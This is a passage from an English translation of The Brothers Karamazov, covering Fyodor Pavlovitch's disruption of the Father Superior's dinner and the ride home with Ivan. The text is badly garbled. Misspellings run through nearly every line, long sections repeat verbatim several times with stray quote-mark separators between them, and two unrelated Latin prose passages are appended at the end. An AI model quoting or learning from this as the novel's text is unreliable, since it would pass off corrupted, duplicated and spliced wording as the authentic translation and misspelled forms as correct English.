"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
Itaque verae amicitiae difficillime reperiuntur in iis qui in honoribus reque publica versantur; ubi enim istum invenias qui honorem amici anteponat suo? Quid? Haec ut omittam, quam graves, quam difficiles plerisque videntur calamitatum societates! Ad quas non est facile inventu qui descendant. Quamquam Ennius recte.
Et interdum acciderat, ut siquid in penetrali secreto nullo citerioris vitae ministro praesente paterfamilias uxori susurrasset in aurem, velut Amphiarao referente aut Marcio, quondam vatibus inclitis, postridie disceret imperator. ideoque etiam parietes arcanorum soli conscii timebantur.
Iamque lituis cladium concrepantibus internarum non celate ut antea turbidum saeviebat ingenium a veri consideratione detortum et nullo inpositorum vel conpositorum fidem sollemniter inquirente nec discernente a societate noxiorum insontes velut exturbatum e iudiciis fas omne discessit, et causarum legitima silente defensione carnifex rapinarum sequester et obductio capitum et bonorum ubique multatio versabatur per orientales provincias, quas recensere puto nunc oportunum absque Mesopotamia digesta, cum bella Parthica dicerentur, et Aegypto, quam necessario aliud reieci ad tempus.
